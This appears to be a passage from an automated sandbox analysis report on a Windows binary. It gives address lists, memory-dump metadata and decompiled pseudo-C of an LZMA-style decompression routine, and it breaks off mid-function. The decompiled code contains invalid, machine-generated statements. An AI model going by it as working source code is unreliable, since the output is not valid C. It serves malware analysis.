                  0x00406a73
                  0x00000000
                  0x00000000
                  0x00406ac7
                  0x00406acb
                  0x00406aee
                  0x00406af1
                  0x00406af4
                  0x00406afe
                  0x00406acd
                  0x00406acd
                  0x00406ad0
                  0x00406ad3
                  0x00406ad6
                  0x00406ae3
                  0x00406ae6
                  0x00406ae6
                  0x00000000
                  0x00000000
                  0x00406b0a
                  0x00406b0e
                  0x00000000
                  0x00000000
                  0x00406b14
                  0x00406b18
                  0x00000000
                  0x00000000
                  0x00406b1e
                  0x00406b20
                  0x00406b24
                  0x00406b24
                  0x00406b27
                  0x00406b2b
                  0x00000000
                  0x00000000
                  0x00406b7b
                  0x00406b7f
                  0x00406b86
                  0x00406b89
                  0x00406b8c
                  0x00406b96
                  0x00000000
                  0x00406b96
                  0x00406b81
                  0x00000000
                  0x00000000
                  0x00406ba2
                  0x00406ba6
                  0x00406bad
                  0x00406bb0
                  0x00406bb3
                  0x00406ba8
                  0x00406ba8
                  0x00406ba8
                  0x00406bb6
                  0x00406bb9
                  0x00406bbc
                  0x00406bbc
                  0x00406bbf
                  0x00406bc2
                  0x00406bc5
                  0x00406bc5
                  0x00406bc8
                  0x00406bcf
                  0x00406bd4
                  0x00000000
                  0x00000000
                  0x00406c62
                  0x00406c62
                  0x00406c66
                  0x00407004
                  0x00000000
                  0x00407004
                  0x00406c6c
                  0x00406c6f
                  0x00406c72
                  0x00406c76
                  0x00406c79
                  0x00406c7f
                  0x00406c81
                  0x00406c81
                  0x00406c81
                  0x00406c84
                  0x00406c87
                  0x00000000
                  0x00000000
                  0x00406857
                  0x00406857
                  0x0040685b
                  0x00406fc8
                  0x00000000
                  0x00406fc8
                  0x00406861
                  0x00406864
                  0x00406867
                  0x0040686b
                  0x0040686e
                  0x00406874
                  0x00406876
                  0x00406876
                  0x00406876
                  0x00406879
                  0x0040687c
                  0x0040687c
                  0x0040687f
                  0x00406882
                  0x00000000
                  0x00000000
                  0x00406888
                  0x0040688e
                  0x00000000
                  0x00000000
                  0x00406894
                  0x00406894
                  0x00406898
                  0x0040689b
                  0x0040689e
                  0x004068a1
                  0x004068a4
                  0x004068a5
                  0x004068a8
                  0x004068aa
                  0x004068b0
                  0x004068b3
                  0x004068b6
                  0x004068b9
                  0x004068bc
                  0x004068bf
                  0x004068c2
                  0x004068de
                  0x004068e1
                  0x004068e4
                  0x004068e7
                  0x004068ee
                  0x004068f2
                  0x004068f4
                  0x004068f8
                  0x004068c4
                  0x004068c4
                  0x004068c8
                  0x004068d0
                  0x004068d5
                  0x004068d7
                  0x004068d9
                  0x004068d9
                  0x004068fb
                  0x00406902
                  0x00406905
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x00406910
                  0x00406910
                  0x00406914
                  0x00406fd4
                  0x00000000
                  0x00406fd4
                  0x0040691a
                  0x0040691d
                  0x00406920
                  0x00406924
                  0x00406927
                  0x0040692d
                  0x0040692f
                  0x0040692f
                  0x0040692f
                  0x00406932
                  0x00406935
                  0x00406935
                  0x00406935
                  0x0040693b
                  0x00000000
                  0x00000000
                  0x0040693d
                  0x00406940
                  0x00406943
                  0x00406946
                  0x00406949
                  0x0040694c
                  0x0040694f
                  0x00406952
                  0x00406955
                  0x00406958
                  0x0040695b
                  0x00406973
                  0x00406976
                  0x00406979
                  0x0040697c
                  0x0040697c
                  0x0040697f
                  0x00406983
                  0x00406985
                  0x0040695d
                  0x0040695d
                  0x00406965
                  0x0040696a
                  0x0040696c
                  0x0040696e
                  0x0040696e
                  0x00406988
                  0x0040698f
                  0x00406992
                  0x00000000
                  0x00406994
                  0x00000000
                  0x00406994
                  0x00406992
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00000000
                  0x00000000
                  0x004069d4
                  0x004069d4
                  0x004069d8
                  0x00406fe0
                  0x00000000
                  0x00406fe0
                  0x004069de
                  0x004069e1
                  0x004069e4
                  0x004069e8
                  0x004069eb
                  0x004069f1
                  0x004069f3
                  0x004069f3
                  0x004069f3
                  0x004069f6
                  0x004069f9
                  0x004069f9
                  0x004069ff
                  0x0040699d
                  0x0040699d
                  0x004069a0
                  0x00000000
                  0x004069a0
                  0x00406a01
                  0x00406a01
                  0x00406a04
                  0x00406a07
                  0x00406a0a
                  0x00406a0d
                  0x00406a10
                  0x00406a13
                  0x00406a16
                  0x00406a19
                  0x00406a1c
                  0x00406a1f
                  0x00406a37
                  0x00406a3a
                  0x00406a3d
                  0x00406a40
                  0x00406a40
                  0x00406a43
                  0x00406a47
                  0x00406a49
                  0x00406a21
                  0x00406a21
                  0x00406a29
                  0x00406a2e
                  0x00406a30
                  0x00406a32
                  0x00406a32
                  0x00406a4c
                  0x00406a53
                  0x00406a56
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406ce5
                  0x00406ce5
                  0x00406ce9
                  0x00407010
                  0x00000000
                  0x00407010
                  0x00406cef
                  0x00406cf2
                  0x00406cf5
                  0x00406cf9
                  0x00406cfc
                  0x00406d02
                  0x00406d04
                  0x00406d04
                  0x00406d04
                  0x00406d07
                  0x00000000
                  0x00000000
                  0x00406ab5
                  0x00406ab5
                  0x00406ab8
                  0x00000000
                  0x00000000
                  0x00406df4
                  0x00406df8
                  0x00406e1a
                  0x00406e1d
                  0x00406e27
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00406dfa
                  0x00406dfd
                  0x00406e01
                  0x00406e04
                  0x00406e04
                  0x00406e07
                  0x00000000
                  0x00000000
                  0x00406eb1
                  0x00406eb5
                  0x00406ed3
                  0x00406ed3
                  0x00406ed3
                  0x00406eda
                  0x00406ee1
                  0x00406ee8
                  0x00406ee8
                  0x00000000
                  0x00406ee8
                  0x00406eb7
                  0x00406eba
                  0x00406ebd
                  0x00406ec0
                  0x00406ec7
                  0x00406e0b
                  0x00406e0b
                  0x00406e0e
                  0x00000000
                  0x00000000
                  0x00406fa2
                  0x00406fa5
                  0x00000000
                  0x00000000
                  0x00406bdc
                  0x00406bde
                  0x00406be5
                  0x00406be6
                  0x00406be8
                  0x00406beb
                  0x00000000
                  0x00000000
                  0x00406bf3
                  0x00406bf6
                  0x00406bf9
                  0x00406bfb
                  0x00406bfd
                  0x00406bfd
                  0x00406bfe
                  0x00406c01
                  0x00406c08
                  0x00406c0b
                  0x00406c19
                  0x00000000
                  0x00000000
                  0x00406eef
                  0x00406eef
                  0x00406ef2
                  0x00406ef9
                  0x00000000
                  0x00000000
                  0x00406efe
                  0x00406efe
                  0x00406f02
                  0x0040703a
                  0x00000000
                  0x0040703a
                  0x00406f08
                  0x00406f0b
                  0x00406f0e
                  0x00406f12
                  0x00406f15
                  0x00406f1b
                  0x00406f1d
                  0x00406f1d
                  0x00406f1d
                  0x00406f20
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f26
                  0x00406f26
                  0x00406f2a
                  0x00406f8a
                  0x00406f8d
                  0x00406f92
                  0x00406f93
                  0x00406f95
                  0x00406f97
                  0x00406f9a
                  0x00406ea6
                  0x00406ea6
                  0x00000000
                  0x00406ea6
                  0x00406f2c
                  0x00406f32
                  0x00406f35
                  0x00406f38
                  0x00406f3b
                  0x00406f3e
                  0x00406f41
                  0x00406f44
                  0x00406f47
                  0x00406f4a
                  0x00406f4d
                  0x00406f66
                  0x00406f69
                  0x00406f6c
                  0x00406f6f
                  0x00406f73
                  0x00406f75
                  0x00406f75
                  0x00406f76
                  0x00406f79
                  0x00406f4f
                  0x00406f4f
                  0x00406f57
                  0x00406f5c
                  0x00406f5e
                  0x00406f61
                  0x00406f61
                  0x00406f7c
                  0x00406f83
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406c21
                  0x00406c24
                  0x00406c5a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8d
                  0x00406d8d
                  0x00406d90
                  0x00406d92
                  0x0040701c
                  0x00000000
                  0x0040701c
                  0x00406d98
                  0x00406d9b
                  0x00000000
                  0x00000000
                  0x00406da1
                  0x00406da5
                  0x00406da8
                  0x00406da8
                  0x00406da8
                  0x00000000
                  0x00406da8
                  0x00406c26
                  0x00406c28
                  0x00406c2a
                  0x00406c2c
                  0x00406c2f
                  0x00406c30
                  0x00406c32
                  0x00406c34
                  0x00406c37
                  0x00406c3a
                  0x00406c50
                  0x00406c55
                  0x00406c8d
                  0x00406c8d
                  0x00406c91
                  0x00406cbd
                  0x00406cbf
                  0x00406cc6
                  0x00406cc9
                  0x00406ccc
                  0x00406ccc
                  0x00406cd1
                  0x00406cd1
                  0x00406cd3
                  0x00406cd6
                  0x00406cdd
                  0x00406ce0
                  0x00406d0d
                  0x00406d0d
                  0x00406d10
                  0x00406d13
                  0x00406d87
                  0x00406d87
                  0x00406d87
                  0x00000000
                  0x00406d87
                  0x00406d15
                  0x00406d1b
                  0x00406d1e
                  0x00406d21
                  0x00406d24
                  0x00406d27
                  0x00406d2a
                  0x00406d2d
                  0x00406d30
                  0x00406d33
                  0x00406d36
                  0x00406d4f
                  0x00406d51
                  0x00406d54
                  0x00406d55
                  0x00406d58
                  0x00406d5a
                  0x00406d5d
                  0x00406d5f
                  0x00406d61
                  0x00406d64
                  0x00406d66
                  0x00406d69
                  0x00406d6d
                  0x00406d6f
                  0x00406d6f
                  0x00406d70
                  0x00406d73
                  0x00406d76
                  0x00406d38
                  0x00406d38
                  0x00406d40
                  0x00406d45
                  0x00406d47
                  0x00406d4a
                  0x00406d4a
                  0x00406d79
                  0x00406d80
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00000000
                  0x00406d82
                  0x00000000
                  0x00406d82
                  0x00406d80
                  0x00406c93
                  0x00406c96
                  0x00406c98
                  0x00406c9b
                  0x00406c9e
                  0x00406ca1
                  0x00406ca3
                  0x00406ca6
                  0x00406ca9
                  0x00406ca9
                  0x00406cac
                  0x00406cac
                  0x00406caf
                  0x00406cb6
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00000000
                  0x00406cb8
                  0x00000000
                  0x00406cb8
                  0x00406cb6
                  0x00406c3c
                  0x00406c3f
                  0x00406c41
                  0x00406c44
                  0x00000000
                  0x00000000
                  0x004069a3
                  0x004069a3
                  0x004069a7
                  0x00406fec
                  0x00000000
                  0x00406fec
                  0x004069ad
                  0x004069b0
                  0x004069b3
                  0x004069b6
                  0x004069b9
                  0x004069bc
                  0x004069bf
                  0x004069c1
                  0x004069c4
                  0x004069c7
                  0x004069ca
                  0x004069cc
                  0x004069cc
                  0x004069cc
                  0x00000000
                  0x00000000
                  0x00406b2e
                  0x00406b2e
                  0x00406b32
                  0x00406ff8
                  0x00000000
                  0x00406ff8
                  0x00406b38
                  0x00406b3b
                  0x00406b3e
                  0x00406b41
                  0x00406b43
                  0x00406b43
                  0x00406b43
                  0x00406b46
                  0x00406b49
                  0x00406b4c
                  0x00406b4f
                  0x00406b52
                  0x00406b55
                  0x00406b56
                  0x00406b58
                  0x00406b58
                  0x00406b58
                  0x00406b5b
                  0x00406b5e
                  0x00406b61
                  0x00406b64
                  0x00406b64
                  0x00406b64
                  0x00406b67
                  0x00406b69
                  0x00406b69
                  0x00000000
                  0x00000000
                  0x00406dab
                  0x00406dab
                  0x00406dab
                  0x00406daf
                  0x00000000
                  0x00000000
                  0x00406db5
                  0x00406db8
                  0x00406dbb
                  0x00406dbe
                  0x00406dc0
                  0x00406dc0
                  0x00406dc0
                  0x00406dc3
                  0x00406dc6
                  0x00406dc9
                  0x00406dcc
                  0x00406dcf
                  0x00406dd2
                  0x00406dd3
                  0x00406dd5
                  0x00406dd5
                  0x00406dd5
                  0x00406dd8
                  0x00406ddb
                  0x00406dde
                  0x00406de1
                  0x00406de4
                  0x00406de8
                  0x00406dea
                  0x00406ded
                  0x00000000
                  0x00406def
                  0x00406b6c
                  0x00406b6c
                  0x00000000
                  0x00406b6c
                  0x00406ded
                  0x00407022
                  0x00407044
                  0x0040704a
                  0x0040704c
                  0x00407053
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00407059
                  0x00407059
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 51f3059c0ab10d0f6eca9bda3b9c7ef9d62a7fb15769fd34cf569834d4f38521
                  • Instruction ID: 30cc61a65d8e7361f2687543d4853da4ee9de610700e1b42b944a6768b2f9653
                  • Opcode Fuzzy Hash: 51f3059c0ab10d0f6eca9bda3b9c7ef9d62a7fb15769fd34cf569834d4f38521
                  • Instruction Fuzzy Hash: D4817771D04229CBDF24CFA9C8447AEBBB0FF44305F21816AD856BB281C7796A86DF45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406A5D, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406A5D() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407061))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
